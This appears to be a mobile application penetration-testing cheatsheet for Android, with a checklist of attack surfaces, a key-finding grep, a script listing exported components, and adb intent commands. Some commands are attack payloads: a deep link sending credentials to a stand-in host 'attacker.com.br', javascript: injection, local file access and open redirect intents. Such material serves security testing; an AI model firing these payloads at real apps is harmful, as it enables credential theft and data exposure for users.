Mobile hacking

This checklist is designed as a practical cheatsheet for mobile application security testing.
It provides a structured way to quickly review common attack surfaces, identify weak points, and validate security controls in mobile apps.
The goal is efficiency: focus on what matters, minimize noise, and cover the techniques that consistently reveal real issues.

  • Folders /assets and /res/raw
  • Grep for sensitive keys (Google API key pattern) using: grep -rE 'AIza[0-9A-Za-z_-]{35}' .
  • Search for sensitive .txt files
  • Inspect the Manifest.xml file
  • Check /res/values/strings.xml for API keys
  • Analyse @xml/network_security_config.xml
  • Test deep links declared in Manifest.xml
  • Verify Firebase access to /.json, /Users.json, /Logs.json
  • Check Activities/Services/Intents with the adb tool
  • Grep for sensitive keywords in decompiled JAR files and the APK's folders
  • Sensitive information disclosed in application error messages
  • Binary reverse engineering
  • Collect URLs and endpoints from the APK
  • Sensitive information disclosed in storage of the mobile device
  • Sensitive information found in logs
  • Sensitive information found in cache
  • Sensitive information found in the installed application folder
  • Sensitive information stored in shared preference files
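The Manifest.xml and component checks above boil down to one question: which components can be reached from outside the app, and with which URIs? The script below is an added example (not from the original cheatsheet) that answers it for a decoded AndroidManifest.xml; the manifest it parses is a constructed sample, and the `.MainActivity`, `.CommonActivity`, `.SyncService` and `.BootReceiver` names in it are made up.

```python
import xml.etree.ElementTree as ET
ANDROID = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample manifest (not from a real app) so the script runs offline;
# for a real review feed it the AndroidManifest.xml decoded by apktool.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="custom" android:host="deeplink"/>
        <data android:scheme="https" android:host="example.com"/>
      </intent-filter>
    </activity>
    <activity android:name=".CommonActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="file"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="false"/>
    <receiver android:name=".BootReceiver" android:exported="true"/>
  </application>
</manifest>"""

def exported_components(manifest_xml):
    """Return [(kind, name, exported, ['scheme://host', ...])] for every component."""
    root = ET.fromstring(manifest_xml)
    result = []
    for kind in ("activity", "service", "receiver"):
        for comp in root.iter(kind):
            filters = comp.findall("intent-filter")
            declared = comp.get(ANDROID + "exported")
            # No explicit attribute: before targetSdk 31 any intent-filter implies exported.
            exported = bool(filters) if declared is None else declared.lower() == "true"
            links = []
            for flt in filters:
                for data in flt.findall("data"):
                    scheme = data.get(ANDROID + "scheme")
                    if scheme:  # collect the URIs the component will accept
                        links.append(scheme + "://" + data.get(ANDROID + "host", ""))
            result.append((kind, comp.get(ANDROID + "name"), exported, links))
    return result

if __name__ == "__main__":
    for kind, name, exported, links in exported_components(SAMPLE_MANIFEST):
        if exported:  # the reachable surface to review against the checklist above
            print(f"{kind:<8} {name:<18} {', '.join(links) or '(no URI filter)'}")
```

Every line it prints is a component worth walking through the checklist: a VIEW filter with a file or custom scheme is where the local-file and deep-link items apply.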

  • Client/server-side attacks
    • Check for SQL injection
    • XML injection
    • XSS injection
  • App-level DoS (long inputs, JSON DoS)
  • Broken authentication & authorization
    • Session behaviour after password reset
    • Expired token can be reused
    • OAuth flow
    • 2FA bypass
    • Cleartext transmission
    • Auth bypass using response manipulation
  • Broken access control
    • SSRFs
    • Privilege escalations
    • IDORs
    • Unauthorized/sensitive API calls
  • CAPTCHA implementation flaws & bypass
  • Check all HTTP methods (PUT, DELETE, etc.; use Burp Intruder for HTTP verb tampering)
  • Enumeration of other users' sensitive details
  • Malicious file upload
  • Server-side flaws (IIS, Apache, Tomcat, etc.)

Keywords:

secret
password
user
token
api
key
internal
staging
ftp
ssh
http
.plist
.json
.conf

ADB command to trigger schemes:

adb shell am start -W -a android.intent.action.VIEW -d "custom://intent"

Open redirection + credential theft:

adb shell am start -a android.intent.action.VIEW -d "custom://deeplink?parameter=https://attacker.com.br" --ez authentication_header true

ADB to trigger components:

Activity:

adb shell am start -n "com.peirr.test/com.peirr.test.MyActivity" --es name "John" --ei age 30

Broadcast Receiver:

adb shell am broadcast -n "com.peirr.test/com.peirr.test.MyReceiver" --es name "John" --ei age 30

Services:

adb shell am startservice -n "com.peirr.test/com.peirr.test.MyService" --es name "John" --ei age 30

XSS with available parameters:

adb shell am start -n com.company.apk/com.company.mseg.activity.CommonActivity -e url "javascript:alert(1)"

Schemes allowed in the Activity:

To reproduce local file access, use:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "file:///storage/emulated/0/Download/document-blank.pdf"

To reproduce JavaScript injection:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "javascript://example.com%0A alert(1);"

To reproduce open redirect:

adb shell am start -n com.company.apk/com.company.android.CommonActivity -d "http://attacker.com.br"